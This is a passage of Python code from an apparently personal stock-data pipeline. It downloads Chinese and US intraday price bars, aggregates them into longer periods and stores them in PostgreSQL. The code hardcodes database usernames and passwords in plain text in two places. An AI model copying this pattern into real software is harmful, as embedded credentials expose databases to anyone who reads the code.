tmp_data_60.update(symbol, getdatafromdatabase(table_name_60, DataContext.limitfordatafetched_60))
table_name_240 = tablename_prefixes[3] + symbol
tmp_data_240.update(symbol, getdatafromdatabase(table_name_240, DataContext.limitfordatafetched_240))
else:
logger.error('%s does not exist', (symbol_paths[stock_group[indicator]]))
exit()
if DataContext.iscountryChina():
if indicator == "中小企业板":
self.symbols_l_small = tmp_symbol_l
self.symbols_exchange_l_small = tmp_symbol_exchange_l
self.China_small_15 = tmp_data
self.China_small_30 = tmp_data_30
self.China_small_60 = tmp_data_60
self.China_small_240 = tmp_data_240
elif indicator == "创业板":
self.symbols_l_startup = tmp_symbol_l
self.symbols_exchange_l_startup = tmp_symbol_exchange_l
self.China_startup_15 = tmp_data
self.China_startup_30 = tmp_data_30
self.China_startup_60 = tmp_data_60
self.China_startup_240 = tmp_data_240
elif indicator == "科创板":
self.symbols_l_tech_startup = tmp_symbol_l
self.symbols_exchange_l_tech_startup = tmp_symbol_exchange_l
self.China_tech_startup_15 = tmp_data
self.China_tech_startup_30 = tmp_data_30
self.China_tech_startup_60 = tmp_data_60
self.China_tech_startup_240 = tmp_data_240
elif indicator == "主板A股":
self.symbols_l_sh_a = tmp_symbol_l
self.symbols_exchange_l_sh_a = tmp_symbol_exchange_l
self.China_sh_a_15 = tmp_data
self.China_sh_a_30 = tmp_data_30
self.China_sh_a_60 = tmp_data_60
self.China_sh_a_240 = tmp_data_240
elif indicator == "主板":
self.symbols_l_sz_a = tmp_symbol_l
self.symbols_exchange_l_sz_a = tmp_symbol_exchange_l
self.China_sz_a_15 = tmp_data
self.China_sz_a_30 = tmp_data_30
self.China_sz_a_60 = tmp_data_60
self.China_sz_a_240 = tmp_data_240
elif DataContext.iscountryUS():
if indicator == "NASDAQ":
self.symbols_l_nasdaq = tmp_symbol_exchange_l
self.symbols_exchange_l_nasdaq = tmp_symbol_l
self.US_nasdaq_15 = tmp_data
self.US_nasdaq_30 = tmp_data_30
elif indicator == "NYSE":
self.symbols_l_nyse = tmp_symbol_exchange_l
self.symbols_exchange_l_nyse = tmp_symbol_l
self.US_nyse_15 = tmp_data
self.US_nyse_30 = tmp_data_30
elif indicator == "AMEX":
self.symbols_l_amex = tmp_symbol_exchange_l
self.symbols_exchange_l_amex = tmp_symbol_l
self.US_amex_15 = tmp_data
self.US_amex_30 = tmp_data_30
logger.debug("--- It is done with preparation of data --- " + indicator)
@time_measure
def csqsnapshot_t(codes, indicators, options=""):
return c.csqsnapshot(codes, indicators, options)
connections = threading.local()
stock_group = {"科创板": 'tech_startup',
"中小企业板": 'small',
"创业板": 'startup',
"主板A股": 'sh_a',
"主板": 'sz_a',
"NASDAQ": 'nasdaq',
"NYSE": 'nyse',
"AMEX": 'amex'}
columns = ['gid', 'open', 'close', 'high', 'low', 'volume', 'time', 'isGreater']
root_path = r'/Users/shicaidonghua/Documents/stocks/quant_akshare/'
symbol_paths = {'small': root_path + 'small_symbols.csv',
'startup': root_path + 'startup_symbols.csv',
'tech_startup': root_path + 'tech_startup_symbols.csv',
'sh_a': root_path + 'sh_a_symbols.csv',
'sz_a': root_path + 'sz_a_symbols.csv',
'nasdaq': root_path + 'nasdaq_symbols.csv',
'nyse': root_path + 'nyse_symbols.csv',
'amex': root_path + 'amex_symbols.csv'}
time_windows_15 = [0 for i in range(100)] # set 100 so as to test after market
time_windows_30 = [0 for i in range(100)] # set 100 so as to test after market
time_windows_60 = [0 for i in range(100)] # set 100 so as to test after market
sectors_CN = {'000001': "优选股关注",
'007180': "券商概念",
'007224': "大飞机",
'007315': "半导体",
'007205': "国产芯片",
'007039': "生物疫苗",
'007001': "军工",
'007139': "医疗器械",
'007146': "病毒防治",
'007147': "独家药品",
'007162': "基因测序",
'007167': "免疫治疗",
'007188': "健康中国",
'007195': "人工智能",
'007200': "区块链",
'007206': "新能源车",
'007212': "生物识别",
'007218': "精准医疗",
'007220': "军民融合",
'007243': "互联医疗",
'007246': "体外诊断",
'007284': "数字货币",
'007332': "长寿药",
'007336': "疫苗冷链",
'007339': "肝素概念",
'014010018003': "生物医药",
'004012003001': "太阳能",
'015011003003': "光伏",
'007371': "低碳冶金",
'018001001002001': "新能源设备与服务",
'007068': "太阳能",
'007005': "节能环保",
'007152': "燃料电池",
'007307': "HIT电池",
'007370': "光伏建筑一体化",
'007369': "碳化硅",
'007003': "煤化工",
'007004': "新能源",
'007007': "AB股",
'007008': "AH股",
'007009': "HS300_",
'007010': "次新股",
'007013': "中字头",
'007014': "创投",
'007017': "网络游戏",
'007019': "ST股",
'007020': "化工原料",
'007022': "参股券商",
'007024': "稀缺资源",
'007025': "社保重仓",
'007028': "新材料",
'007029': "参股期货",
'007030': "参股银行",
'007032': "转债标的",
'007033': "成渝特区",
'007034': "QFII重仓",
'007035': "基金重仓",
'007038': "黄金概念",
'007040': "深圳特区",
'007043': "机构重仓",
'007045': "物联网",
'007046': "移动支付",
'007048': "油价相关",
'007049': "滨海新区",
'007050':"股权激励",
'007051': "深成500",
'007053': "预亏预减",
'007054': "预盈预增",
'007057': "锂电池",
'007058': "核能核电",
'007059': "稀土永磁",
'007060': "云计算",
'007061': "LED",
'007062': "智能电网",
'007072': "铁路基建",
'007074': "长江三角",
'007075': "风能",
'007076': "融资融券",
'007077': "水利建设",
'007079': "新三板",
'007080': "海工装备",
'007082': "页岩气",
'007083': "参股保险",
'007085': "油气设服",
'007089': "央视50_",
'007090': "上证50_",
'007091': "上证180_",
'007093': "食品安全",
'007094': "中药",
'007096': "石墨烯",
'007098': "3D打印",
'007099': "地热能",
'007100': "海洋经济",
'007102': "通用航空",
'007104': "智慧城市",
'007105': "北斗导航",
'007108': "土地流转",
'007109': "送转预期",
'007110': "大数据",
'007111': "中超概念",
'007112': "B股",
'007113': "互联金融",
'007114': "创业成份",
'007116': "智能机器",
'007117': "智能穿戴",
'007118': "手游概念",
'007119': "上海自贸",
'007120': "特斯拉",
'007122': "养老概念",
'007124': "网络安全",
'007125': "智能电视",
'007131': "在线教育",
'007133': "二胎概念",
'007137': "电商概念",
'007136': "苹果概念",
'007138': "国家安防",
'007140': "生态农业",
'007142': "彩票概念",
'007143': "沪企改革",
'007145': "蓝宝石",
'007148': "粤港自贸",
'007149': "超导概念",
'007150': "智能家居",
'007153': "国企改革",
'007154': "京津冀",
'007155': "举牌",
'007159': "阿里概念",
'007160': "氟化工",
'007161': "在线旅游",
'007164': "小金属",
'007165': "国产软件",
'007166': "IPO受益",
'007168': "全息技术",
'007169': "充电桩",
'007170': "中证500",
'007172': "超级电容",
'007173': "无人机",
'007174': "上证380",
'007175': "人脑工程",
'007176': "沪股通",
'007177': "体育产业",
'007178': "赛马概念",
'007179': "量子通信",
'007181': "一带一路",
'007182': "2025规划",
'007183': "5G概念",
'007184': "航母概念",
'007186': "北京冬奥",
'007187': "证金持股",
'007190': "PPP模式",
'007191': "虚拟现实",
'007192': "高送转",
'007193': "海绵城市",
'007196': "增强现实",
'007197': "无人驾驶",
'007198': "工业4.0",
'007199': "壳资源",
'007201': "OLED",
'007202': "单抗概念",
'007203': "3D玻璃",
'007204': "猪肉概念",
'007207': "车联网",
'007209': "网红直播",
'007210': "草甘膦",
'007211': "无线充电",
'007213': "债转股",
'007214': "快递概念",
'007215': "股权转让",
'007216': "深股通",
'007217': "钛白粉",
'007219': "共享经济",
'007221': "超级品牌",
'007222': "贬值受益",
'007223': "雄安新区",
'007225': "昨日涨停",
'007226': "昨日连板",
'007227': "昨日触板",
'007228': "可燃冰",
'007230': "MSCI中国",
'007231': "创业板综",
'007232': "深证100R",
'007233': "租售同权",
'007234': "养老金",
'007236': "新零售",
'007237': "万达概念",
'007238': "工业互联",
'007239': "小米概念",
'007240': "乡村振兴",
'007241': "独角兽",
'007244': "东北振兴",
'007245': "知识产权",
'007247': "富士康",
'007248': "天然气",
'007249': "百度概念",
'007251': "影视概念",
'007253': "京东金融",
'007254': "进口博览",
'007255': "纾困概念",
'007256': "冷链物流",
'007257': "电子竞技",
'007258': "华为概念",
'007259': "纳米银",
'007260': "工业大麻",
'007263': "超清视频",
'007264': "边缘计算",
'007265': "数字孪生",
'007266': "超级真菌",
'007268': "氢能源",
'007269': "电子烟",
'007270': "人造肉",
'007271': "富时罗素",
'007272': "GDR",
'007275': "青蒿素",
'007276': "垃圾分类",
'007278': "ETC",
'007280': "PCB",
'007281': "分拆预期",
'007282': "标准普尔",
'007283': "UWB概念",
'007285': "光刻胶",
'007286': "VPN",
'007287': "智慧政务",
'007288': "鸡肉概念",
'007289': "农业种植",
'007290': "医疗美容",
'007291': "MLCC",
'007292': "乳业",
'007293': "无线耳机",
'007294': "阿兹海默",
'007295': "维生素",
'007296': "白酒",
'007297': "IPv6",
'007298': "胎压监测",
'007299': "CRO",
'007300': "3D摄像头",
'007301': "MiniLED",
'007302': "云游戏",
'007303': "广电",
'007304': "传感器",
'007305': "流感",
'007306': "转基因",
'007308': "降解塑料",
'007309': "口罩",
'007310': "远程办公",
'007311': "消毒剂",
'007312': "医废处理",
'007313': "WiFi",
'007314': "氮化镓",
'007316': "特高压",
'007317': "RCS概念",
'007318': "天基互联",
'007319': "数据中心",
'007320': "字节概念",
'007321': "地摊经济",
'007322': "三板精选",
'007323': "湖北自贸",
'007324': "免税概念",
'007325': "抖音小店",
'007326': "地塞米松",
'007328': "尾气治理",
'007329': "退税商店",
'007330': "蝗虫防治",
'007331': "中芯概念",
'007333': "蚂蚁概念",
'007334': "代糖概念",
'007335': "辅助生殖",
'007337': "商汤概念",
'007338': "汽车拆解",
'007340': "装配建筑",
'007341': "EDA概念",
'007342': "屏下摄像",
'007343': "MicroLED",
'007344': "氦气概念",
'007345': "刀片电池",
'007346': "第三代半导体",
'007347': "鸿蒙概念",
'007348': "盲盒经济",
'007349': "C2M概念",
'007350': "eSIM",
'007351': "拼多多概念",
'007352': "虚拟电厂",
'007353': "数字阅读",
'007354': "有机硅",
'007355': "RCEP概念",
'007356': "航天概念",
'007357': "6G概念",
'007358': "社区团购",
'007359': "碳交易",
'007360': "水产养殖",
'007361': "固态电池",
'007362': "汽车芯片",
'007363': "注册制次新股",
'007364': "快手概念",
'007365': "注射器概念",
'007366': "化妆品概念",
'007367': "磁悬浮概念",
'007368': "被动元件",
'007372': "工业气体",
# There is unavailable value of gain/loss and money flow for the below sectors
'007373': "电子车牌",
'007374': "核污染防治",
'007375': "华为汽车",
'007376': "换电概念",
'007377': "CAR - T细胞疗法",
'073259': "碳交易"}
sectors_US = {'000001': "优选股关注",
'201001': "中概股"}
# param: echo=True that is used to show each sql statement used in query
engine = create_engine("postgresql+psycopg2://Raymond:123123@localhost:5432/Raymond", encoding='utf-8')
class DataSource(enum.Enum):
EAST_MONEY = 0
AK_SHARE = 1
YAHOO = 2
SNAPSHOT = 3
EFINANCE = 4
def getdbconn():
if 'connection' not in connections.__dict__:
connections.connection = psycopg2.connect(
user="Raymond",
password="123123",
host="127.0.0.1",
port="5432",
database="Raymond")
logger.info('Connect to Raymond\'s database - {}\n current connection is {}\n thread ident is {} and native thread id is {}\n'.
format(connections.connection.get_dsn_parameters(), connections.connection, threading.get_ident(), threading.get_native_id()))
return connections.connection
def createtable(symbols: list, exchange: str, period: int):
conn = getdbconn()
csr = getdbconn().cursor()
stock_name_array = map(str, symbols)
symbols_t = ','.join(stock_name_array)
stock_symbols = '{' + symbols_t + '}'
logger.debug('%s - %s' % (exchange, stock_symbols))
statement_sql = ""
create_table = ""
if DataContext.iscountryChina():
if period == 15:
create_table = "create_table_c"
elif period == 30:
create_table = "create_table_c_30"
elif period == 60:
create_table = "create_table_c_60"
elif period == 240:
create_table = "create_table_c_240"
elif DataContext.iscountryUS():
if period == 15:
create_table = "create_table_u"
elif period == 30:
create_table = "create_table_u_30"
if create_table != "":
statement_sql = "call " + create_table + "(%s,%s);"
csr.execute(statement_sql, (stock_symbols, exchange))
conn.commit()
def droptable(symbols: list, exchange: str):
conn = getdbconn()
csr = getdbconn().cursor()
stock_name_df_array = map(str, symbols)
symbols_t = ','.join(stock_name_df_array)
stock_symbols = '{' + symbols_t + '}'
logger.debug('%s - %s' % (exchange, stock_symbols))
csr.execute("call drop_table_c(%s,%s);", (stock_symbols, exchange))
conn.commit()
update_stat = " do update set open=excluded.open,close=excluded.close,high=excluded.high,low=excluded.low,volume=excluded.volume;"
do_nothing = " do nothing;"
def inserttab(exchange: str, symbol: str, stock_df: pd.DataFrame, datasource: DataSource, period=15, transientdf: pd.DataFrame=None, type_func=1):
conn = getdbconn()
csr = getdbconn().cursor()
if DataContext.iscountryChina():
if datasource == DataSource.AK_SHARE:
stock_day = stock_df['day'].tolist()
header_o = 'open'
header_c = 'close'
header_h = 'high'
header_l = 'low'
header_v = 'volume'
elif datasource == DataSource.SNAPSHOT:
stock_day = stock_df.index.tolist()
header_o = 'open'
header_c = 'close'
header_h = 'high'
header_l = 'low'
header_v = 'volume'
elif datasource == DataSource.EAST_MONEY:
header_o = 'OPEN'
header_c = 'CLOSE'
header_h = 'HIGH'
header_l = 'LOW'
header_v = 'VOLUME'
if type_func == 1:
stock_day = stock_df.index.tolist()
elif type_func == 2:
header_d = 'DATES'
elif datasource == DataSource.EFINANCE:
stock_day = stock_df['日期'].tolist()
header_o = '开盘'
header_c = '收盘'
header_h = '最高'
header_l = '最低'
header_v = '成交量'
statement_start = "insert into china_"
elif DataContext.iscountryUS():
if datasource == DataSource.YAHOO:
stock_day = stock_df.index.tolist()
header_o = 'Open'
header_c = 'Close'
header_h = 'High'
header_l = 'Low'
header_v = 'Volume'
statement_start = "insert into us_"
stock_open = stock_df[header_o]
stock_close = stock_df[header_c]
stock_high = stock_df[header_h]
stock_low = stock_df[header_l]
stock_volume = list(map(int, stock_df[header_v].tolist()))
if period == 15:
count: int = 0
for each_time in stock_day:
if DataContext.iscountryUS():
csr.execute(statement_start + exchange + "_tbl (gid,crt_time,open,close,high,low,volume) " +
"values (%s,%s,%s,%s,%s,%s,%s) on conflict on constraint time_key_" + exchange + update_stat,
(str(symbol), str(each_time), "{:.4f}".format(stock_open[count]), "{:.4f}".format(stock_close[count]),
"{:.4f}".format(stock_high[count]), "{:.4f}".format(stock_low[count]), str(stock_volume[count])))
elif DataContext.iscountryChina():
csr.execute(statement_start + exchange + "_tbl (gid,crt_time,open,close,high,low,volume) " +
"values (%s,%s,%s,%s,%s,%s,%s) on conflict on constraint time_key_" + exchange + update_stat,
(str(symbol), str(each_time), str(stock_open[count]), str(stock_close[count]),
str(stock_high[count]), str(stock_low[count]), str(stock_volume[count])))
count += 1
conn.commit()
logger.debug("%s - rows are %d for period 15 mins" % (symbol, count))
elif period == 30:
count: int = 0
i: int = 0
loop_len = len(stock_day) - 1
while i < loop_len:
timestamp: pd.Timestamp = pd.to_datetime(stock_day[i])
time_point = datetime.datetime(year=timestamp.year, month=timestamp.month, day=timestamp.day,
hour=timestamp.hour, minute=timestamp.minute, second=timestamp.second)
open_time = datetime.datetime.combine(datetime.date(year=timestamp.year, month=timestamp.month, day=timestamp.day),
DataContext.marketopentime)
count_period = (time_point - open_time).seconds // (15 * 60)
if i == 0 and (count_period % 2) == 0:
i += 1
continue
next_idx = i + 1
open_value = stock_open[i]
close_value = stock_close[next_idx]
if stock_high[i] >= stock_high[next_idx]:
high_value = stock_high[i]
else:
high_value = stock_high[next_idx]
if stock_low[i] <= stock_low[next_idx]:
low_value = stock_low[i]
else:
low_value = stock_low[next_idx]
volume_value = stock_volume[i] + stock_volume[next_idx]
i += 2
if DataContext.iscountryUS():
csr.execute(statement_start + exchange + "_tbl_30 (gid,crt_time,open,close,high,low,volume) " +
"values (%s,%s,%s,%s,%s,%s,%s) on conflict on constraint time_key_" + exchange + "_30" + update_stat,
(str(symbol), str(stock_day[next_idx]), "{:.4f}".format(open_value), "{:.4f}".format(close_value),
"{:.4f}".format(high_value), "{:.4f}".format(low_value), str(volume_value)))
elif DataContext.iscountryChina():
csr.execute(statement_start + exchange + "_tbl_30 (gid,crt_time,open,close,high,low,volume) " +
"values (%s,%s,%s,%s,%s,%s,%s) on conflict on constraint time_key_" + exchange + "_30" + update_stat,
(str(symbol), str(stock_day[next_idx]), str(open_value), str(close_value),
str(high_value), str(low_value), str(volume_value)))
transientdf.loc[len(transientdf)] = [str(symbol), open_value, close_value, high_value, low_value,
str(volume_value), stock_day[next_idx], nan]
count += 1
if transientdf is not None:
transientdf.set_index('time', inplace=True)
conn.commit()
logger.debug("%s - rows are %d for period 30 mins" % (symbol, count))
elif period == 60 and DataContext.iscountryChina():
count: int = 0
transientdf.sort_index(inplace=True)
stock_day = transientdf.index.tolist()
stock_open = transientdf['open']
stock_close = transientdf['close']
stock_high = transientdf['high']
stock_low = transientdf['low']
stock_volume = list(map(int, transientdf['volume'].tolist()))
i: int = 0
loop_len = len(stock_day) - 1
while i < loop_len:
next_idx = i + 1
open_value = stock_open[i]
close_value = stock_close[next_idx]
if stock_high[i] >= stock_high[next_idx]:
high_value = stock_high[i]
else:
high_value = stock_high[next_idx]
if stock_low[i] <= stock_low[next_idx]:
low_value = stock_low[i]
else:
low_value = stock_low[next_idx]
volume_value = stock_volume[i] + stock_volume[next_idx]
i += 2
csr.execute(statement_start + exchange + "_tbl_60 (gid,crt_time,open,close,high,low,volume) " +
"values (%s,%s,%s,%s,%s,%s,%s) on conflict on constraint time_key_" + exchange + "_60" + update_stat,
(str(symbol), str(stock_day[next_idx]), str(open_value), str(close_value),
str(high_value), str(low_value), str(volume_value)))
count += 1
conn.commit()
logger.debug("%s - rows are %d for period 60 mins" % (symbol, count))
elif period == 240 and DataContext.iscountryChina():
count: int = 0
if type_func == 2:
for code, row in stock_df.iterrows():
if row[header_o] is not None and \
row[header_c] is not None and \
row[header_h] is not None and \
row[header_l] is not None and \
row[header_v] is not None and \
len(code.split('.')) > 1:
csr.execute(statement_start + exchange + "_tbl_240 (gid,crt_time,open,close,high,low,volume) " +
"values (%s,%s,%s,%s,%s,%s,%s) on conflict on constraint time_key_" + exchange + "_240" + update_stat,
(str(code.split('.')[0]), str(row[header_d]), str(row[header_o]), str(row[header_c]),
str(row[header_h]), str(row[header_l]), str(row[header_v])))
count += 1
else:
transientdf.sort_index(inplace=True)
stock_day = transientdf.index.tolist()
stock_open = transientdf['open']
stock_close = transientdf['close']
stock_high = transientdf['high']
stock_low = transientdf['low']
stock_volume = list(map(int, transientdf['volume'].tolist()))
i: int = 0
stock_day_len = len(stock_day)
# the transientdf contains data of 30 mins
abandoned_15_mins_count = stock_day_len % 8
if abandoned_15_mins_count != 0:
i += abandoned_15_mins_count
while i < stock_day_len:
last_index = i + 7
if last_index > stock_day_len - 1:
break
timestamp: pd.Timestamp = pd.to_datetime(stock_day[i])
time_point = datetime.datetime(year=timestamp.year, month=timestamp.month, day=timestamp.day)
open_value = stock_open[i]
close_value = stock_close[last_index]
high_value = float(stock_high[i])
low_value = float(stock_low[i])
volume_value = stock_volume[i]
i += 1
while i < last_index + 1:
if float(stock_high[i]) > high_value:
high_value = float(stock_high[i])
if float(stock_low[i]) < low_value:
low_value = float(stock_low[i])
volume_value += stock_volume[i]
i += 1
csr.execute(statement_start + exchange + "_tbl_240 (gid,crt_time,open,close,high,low,volume) " +
"values (%s,%s,%s,%s,%s,%s,%s) on conflict on constraint time_key_" + exchange + "_240" + update_stat,
(str(symbol), str(time_point), str(open_value), str(close_value),
str(high_value), str(low_value), str(volume_value)))
count += 1
if count != 0:
conn.commit()
logger.debug("%s - rows are %d for period 240 mins" % (exchange, count))
pbar = tqdm()
def insertdata(exchange: str, group: str, symbols: list, retried, datasource: DataSource, period: str = '15',
type_func=1, context: DataContext=None, adjust: str = "qfq"):
exchange_group = ",".join([exchange, group])
def update_database(exchange_in: str, symbol_s: str, dataset, source):
inserttab(exchange_in, symbol_s, dataset, source)
tmp_df = pd.DataFrame(columns=columns)
inserttab(exchange_in, symbol_s, dataset, source, period=30, transientdf=tmp_df)
inserttab(exchange_in, symbol_s, dataset, source, period=60, transientdf=tmp_df)
inserttab(exchange_in, symbol_s, dataset, source, period=240, transientdf=tmp_df)
if DataContext.iscountryChina():
evt = threading.Event()
if type_func == 1:
global pbar
pbar.total = len(symbols)
pbar.set_description_str(f'{exchange} Processing')
for symbol_i in symbols:
if datasource == DataSource.AK_SHARE:
symbol_internal = group + str(symbol_i)
# stock_zh_df_tmp = ak.stock_zh_a_minute(symbol=symbol_internal, period=period, adjust=adjust)
# FIXME
try:
time.sleep(1)
stock_zh_df_tmp = ak.stock_zh_a_minute(symbol=symbol_internal, period=period, datalengh="16")
except:
stock_zh_df_tmp = pd.DataFrame(columns=columns)
failed_to_get_data_symbols.append((group, str(symbol_i)))
logger.error("it is failed to get stock data for {}".format(symbol_internal))
elif datasource == DataSource.EAST_MONEY:
symbol_internal = ".".join([str(symbol_i), group])
stock_zh_df_tmp = c.cmc(symbol_internal, "OPEN,HIGH,LOW,CLOSE,VOLUME,TIME",
(datetime.datetime.today() - datetime.timedelta(days=3)).strftime(
"%Y-%m-%d"),
datetime.datetime.today().strftime("%Y-%m-%d"),
"AdjustFlag=1,RowIndex=2,Period=15,IsHistory=1,Ispandas=1")
if isinstance(stock_zh_df_tmp, c.EmQuantData) and stock_zh_df_tmp.ErrorCode != 0:
logger.error(
"it is failed to get stock data for {} {} and error code is {} error message is {}".
format(symbol_i, exchange_group, stock_zh_df_tmp.ErrorCode, stock_zh_df_tmp.ErrorMsg))
if stock_zh_df_tmp.ErrorMsg.find('service error') != -1 or \
stock_zh_df_tmp.ErrorCode == 10002011 or \
stock_zh_df_tmp.ErrorCode == 10002010 or \
stock_zh_df_tmp.ErrorCode == 10002004:
append_value(retried, exchange_group, symbol_i)
elif datasource == DataSource.EFINANCE:
freq = 15
stock_zh_df_tmp: pd.DataFrame = ef.stock.get_quote_history(
str(symbol_i), klt=freq,
beg=(datetime.datetime.today() - datetime.timedelta(days=0)).strftime("%Y%m%d"),
end=(datetime.datetime.today() - datetime.timedelta(days=0)).strftime("%Y%m%d"),
fqt=0)
if isinstance(stock_zh_df_tmp, pd.DataFrame) and len(stock_zh_df_tmp) > 0:
update_database(exchange, symbol_i, stock_zh_df_tmp, datasource)
if datasource == DataSource.AK_SHARE:
# watchdog for fetching stock data
global queue_history_data
queue_history_data.put(((group, str(symbol_i)), evt))
evt.wait()
pbar.update(1)
pbar.set_description_str(f'{exchange} Processing => {symbol_i}')
elif type_func == 5:
for symbol_i in symbols:
dataframe_context: pd.DataFrame = context.data15mins[exchange].get(symbol_i)
df_today = pd.DataFrame(columns=['gid', 'open', 'close', 'high', 'low', 'volume'])
index_list = dataframe_context.index.tolist()
total_len = 16
i = - total_len
while i < 0:
row = dataframe_context.iloc[i]
df_today.loc[index_list[i]] = [str(symbol_i), row['open'], row['close'],
row['high'], row['low'], row['volume']]
i += 1
update_database(exchange, symbol_i, df_today, datasource)
# EM has been obsoleted.
elif type_func == 2:
symbol_internals = []
for symbol_i in symbols:
symbol_internals.append(".".join([str(symbol_i), group]))
if group == "SZ":
market = "CNSESZ"
else:
market = "CNSESH"
stock_zh_df_tmp = c.csd(symbol_internals, "OPEN,HIGH,LOW,CLOSE,VOLUME,TIME",
(datetime.datetime.today() - datetime.timedelta(days=3)).strftime("%Y-%m-%d"),
datetime.datetime.today().strftime("%Y-%m-%d"),
"AdjustFlag=1,RowIndex=1,Period=1,Ispandas=1,Market=%s" % market)
if isinstance(stock_zh_df_tmp, c.EmQuantData) and stock_zh_df_tmp.ErrorCode != 0:
logger.error(
"it is failed to get stock data for {} and error code is {} error message is {}".
format(exchange_group, stock_zh_df_tmp.ErrorCode, stock_zh_df_tmp.ErrorMsg))
elif isinstance(stock_zh_df_tmp, pd.DataFrame):
inserttab(exchange, "", stock_zh_df_tmp, datasource, period=240, type_func=type_func)
elif DataContext.iscountryUS():
for symbol_i in symbols:
stock_us_df_tmp = yf.download(tickers=symbol_i, auto_adjust=True, period="10d", interval="15m")
if isinstance(stock_us_df_tmp, pd.DataFrame):
inserttab(exchange, symbol_i, stock_us_df_tmp, datasource)
inserttab(exchange, symbol_i, stock_us_df_tmp, datasource, period=30)
def insertdata_continue(exchange: str, group: str, symbols: list, c_point: str, retried, datasource: DataSource,
period: str = '15', type_func=1, adjust: str = "qfq"):
pos = (pd.Series(symbols) == c_point).argmax() + 1
insertdata(exchange, group, symbols[pos:], retried, datasource, period, type_func)
def insertdata_with_snapshot(exchange:str, group:str, symbols:list, context: DataContext, datasource: DataSource):
insertdata(exchange, group, symbols, {}, datasource, type_func=5, context=context)
def loaddatalocked(indicator: str, exchange: str, symbols: list, operation: int, type_func=1,
datasource=DataSource.AK_SHARE, c_point='', retried={}, period=15,
context: DataContext=None):
group = stock_group[indicator]
if operation == 1:
createtable(symbols, group, period)
elif operation == 2:
insertdata(group, exchange, symbols, retried, datasource, "%d" % period, type_func)
elif operation == 3:
insertdata_continue(group, exchange, symbols, c_point, retried, datasource, "%d" % period, type_func)
elif operation == 4:
droptable(symbols, group)
elif operation == 5:
insertdata_with_snapshot(group, exchange, symbols, context, datasource)
def normalizeticker(symbols: pd.Series) -> pd.Series:
symbols_dict = {}
dict_count = 0
for ticker in symbols:
ticker_str = str(ticker)
diff = 6 - len(ticker_str)
if diff > 0:
prefix = ''
count = 0
while count < diff:
prefix += '0'
count += 1
new_ticker = prefix + ticker_str
symbols_dict[dict_count] = new_ticker
dict_count += 1
new_symbols = pd.Series(symbols_dict)
return new_symbols
def selectgroup(indicator: str):
symbol_path = symbol_paths[stock_group[indicator]]
if pathlib.Path(symbol_path).is_file():
symbolsfromcsv = pd.read_csv(symbol_path)
else:
logger.error("The file {} doesn't exist".format(symbol_path))
exit()
if DataContext.iscountryChina():
if indicator in {"中小企业板", "创业板", "主板"}:
header = "公司代码"
group = 'SZ'
if indicator in {"中小企业板", "主板"}:
returndata = normalizeticker(symbolsfromcsv[header]).tolist()
else:
returndata = symbolsfromcsv[header].tolist()
if indicator in {"科创板", "主板A股"}:
header = 'SECURITY_CODE_A'
group = 'SH'
returndata = symbolsfromcsv[header].tolist()
elif DataContext.iscountryUS():
if indicator == "NASDAQ":
group = 'O'
elif indicator == "NYSE":
group = 'N'
elif indicator == "AMEX":
group = 'A'
symbol_group = symbolsfromcsv['SECURITY_CODE_A'].tolist()
returndata = [symbol_us.split('.')[0] for symbol_us in symbol_group if len(symbol_us.split('.')) > 1]
return group, returndata
def loaddata(indicators, operation: int, c_point='', datasource: DataSource = DataSource.AK_SHARE, period=15, type_func=1, isloginAlready=False):
retriedStocks = {}
if datasource == DataSource.EAST_MONEY and not isloginAlready:
login_em()
try:
loaddatainternal(indicators, operation, type_func, c_point, retriedStocks, datasource, period)
if datasource == DataSource.EAST_MONEY and type_func == 1:
reloaddata(retriedStocks)
finally:
if not isloginAlready:
if datasource == DataSource.EAST_MONEY:
logout_em()
if getdbconn():
getdbconn().cursor().close()
getdbconn().close()
logger.debug("PostgreSQL connection is closed")
def loaddatainternal(indicators, operation: int, type_func=1, c_point='', retried={},
datasource: DataSource = DataSource.AK_SHARE, period=15, context: DataContext=None):
try:
for indicator in indicators:
logger.debug("The board data is downloaded for is {} and native thread id is {} and thread ident is {}".
format(indicator, threading.get_native_id(), threading.get_ident()))
group, symbols = selectgroup(indicator)
loaddatalocked(indicator, group, symbols, operation, type_func, datasource,
c_point, retried, period, context)
except psycopg2.Error as error:
logger.error("Error while connecting to PostgreSQL", error)
except Exception as ee:
logger.error("error >>>", ee)
traceback.print_exc()
def reloaddata(stocks, datasource: DataSource = DataSource.EAST_MONEY):
if len(stocks) == 0:
return
else:
retriedstocks = {}
logger.debug("stocks reloaded are {}".format(stocks))
for index, value in stocks.items():
idx = index.split(",")
if isinstance(value, list):
symbols = value
else:
symbols = [value]
if len(idx) > 1:
insertdata(idx[0], idx[1], symbols, retriedstocks, datasource)
logger.debug("Stocks that is still NOT downloaded are {}".format(retriedstocks))
else:
logger.debug("error occurs in idx -> {}".format(idx))
def checksymbols(*indicators: str):
logger.info("start to check if there are new stocks on market.")
for indicator in indicators:
# TODO need to use old version of function selectgroup
group_mark, symbols = selectgroup(indicator)
print(symbols)
symbol_path = symbol_paths[stock_group[indicator]]
if pathlib.Path(symbol_path).is_file():
symbolsfromcsv = pd.read_csv(symbol_path)
length_symbols = len(symbols)
diff = length_symbols - len(symbolsfromcsv)
if diff > 0:
for num in range(diff):
index = length_symbols - num - 1
print(symbols[index])
# create new partition and insert data
else:
symbols.to_csv(symbol_path, index=False)
logger.info("Checking new stocks is done.")
class ProcessStatus(enum.Enum):
STOP = 0
START = 1
# ================================================================
class ActionBase:
"""
This is a base class. All action should extend to it.
"""
def __init__(self, data: pd.DataFrame):
self._data = data
# retrieve latest close price with a given period
def close_ticker(self, period: int):
return self._data['close'][period]
# retrieve latest open price with a given period
def open_ticker(self, period: int):
return self._data['open'][period]
# retrieve latest exchange volume with a given period
def volume_ticker(self, period: int):
return self._data['volume'][period]
# retrieve latest high price with a given period
def high_ticker(self, period: int):
return self._data['high'][period]
# retrieve latest low price with a given period
def low_ticker(self, period: int):
return self._data['low'][period]
# retrieve quote with given period
def refer_ticker(self, start_index: int, period: int, fn_ticker):
index = start_index - period
return fn_ticker(index)
def getindex(self, timestamp: pd.Timestamp):
tsi = self._data.index
length = len(tsi)
i = length - 1
while i > -1:
if tsi[i] == timestamp:
break
i -= 1
else:
i = None
return i
@abstractmethod
def executeaction(self, **kwargs):
pass
class MAAction(ActionBase):
def __init__(self, startindex: int, endindex: int, period: int, data: pd.DataFrame):
super().__init__(data)
self.__startindex = startindex
self.__endindex = endindex
self.__period = period
def __ma(self, fn_ticker):
ret = {}
totalinperiod: float64 = 0
traverseback = 1 - self.__period
if (len(self._data) + self.__endindex) < (0 - traverseback) or \
